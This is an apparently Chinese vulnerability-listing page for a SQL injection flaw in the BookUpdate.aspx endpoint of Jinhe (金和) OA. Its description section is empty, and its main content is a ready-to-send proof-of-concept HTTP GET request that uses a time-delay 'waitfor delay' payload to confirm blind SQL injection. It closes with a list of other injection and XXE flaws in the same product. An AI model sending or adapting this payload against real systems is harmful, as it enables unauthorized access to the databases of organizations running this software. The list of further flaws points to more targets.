金和OA BookUpdate.aspx SQL注入漏洞

漏洞描述

PoC代码

GET /c6/Jhsoft.Web.AddressBook/BookUpdate.aspx/?id=1%27waitfor+delay%270%3A0%3A5%27-- HTTP/1.1

相关漏洞推荐

• 金和OA CustomerImport.aspx 存在XML注入漏洞
• 金和OA blog-XmlDeal XXE漏洞
• 金和OA Jhsoft.Web.blog SQL注入漏洞
• 金和OA XmlPage.aspx 存在XML注入漏洞
• 金和OA ReportSetting.aspx SQL注入漏洞
• 金和OA ReportParaList.aspx SQL注入漏洞
• 金和OA BITypeEdit.aspx SQL注入漏洞
• 金和OA AssTypeSendXML.aspx XXE漏洞
• 金和OA存在SQL注入漏洞
• 金和OA AskDoc.aspx XXE漏洞
• 金和OA AskAttachment.aspx SQL注入漏洞
• 金和OA XmlHttpGetPrintNumber.aspx SQL注入漏洞
• 金和OA Archives-XmlHttp.aspx XXE漏洞